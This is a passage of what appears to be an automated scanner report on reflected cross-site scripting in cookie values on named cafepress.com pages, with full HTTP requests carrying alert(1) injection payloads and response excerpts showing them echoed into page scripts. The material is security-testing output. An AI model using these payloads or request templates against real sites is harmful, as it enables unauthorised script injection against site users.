__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd434d"-alert(1)-"e31525dd84b; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 60935
Date: Sun, 26 Dec 2010 13:46:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd434d"-alert(1)-"e31525dd84b";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.89. http://www.cafepress.com/cp/info/help/tos.aspx [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/help/tos.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc886</script><script>alert(1)</script>e31d106e7a6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/info/help/tos.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=dc886</script><script>alert(1)</script>e31d106e7a6; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 62950
Date: Sun, 26 Dec 2010 13:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 62950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
n_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'HelpPage'
window.cafepress.tealeaf.searchTerm = 'dc886</script><script>alert(1)</script>e31d106e7a6'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.90. http://www.cafepress.com/cp/info/sell/index.aspx [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/sell/index.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 993ac"-alert(1)-"2f0f584fdd2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/info/sell/index.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA993ac"-alert(1)-"2f0f584fdd2; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 51652
Date: Sun, 26 Dec 2010 13:46:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 51652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA993ac"-alert(1)-"2f0f584fdd2";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.91. http://www.cafepress.com/cp/info/sell/index.aspx [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/sell/index.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41f40</script><script>alert(1)</script>dbb7f115d79 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/info/sell/index.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=41f40</script><script>alert(1)</script>dbb7f115d79; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 51674
Date: Sun, 26 Dec 2010 13:46:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 51674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
s.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/cp/info/sell/index.aspx'
window.cafepress.tealeaf.searchTerm = '41f40</script><script>alert(1)</script>dbb7f115d79'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.92. http://www.cafepress.com/cp/sitemap/ [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/sitemap/

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8570a"-alert(1)-"90117c7ff9b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/sitemap/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8570a"-alert(1)-"90117c7ff9b; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 147634
Date: Sun, 26 Dec 2010 13:46:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 147634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8570a"-alert(1)-"90117c7ff9b";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.93. http://www.cafepress.com/cp/sitemap/ [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/sitemap/

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1af17</script><script>alert(1)</script>e3cc51a30ee was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/sitemap/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=1af17</script><script>alert(1)</script>e3cc51a30ee; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 149634
Date: Sun, 26 Dec 2010 13:46:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 149634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
ess.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/cp/sitemap/index.aspx'
window.cafepress.tealeaf.searchTerm = '1af17</script><script>alert(1)</script>e3cc51a30ee'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.94. http://www.cafepress.com/cp/viewcart.aspx [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/viewcart.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e199a"-alert(1)-"33c6f5a13e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/viewcart.aspx?s=search HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
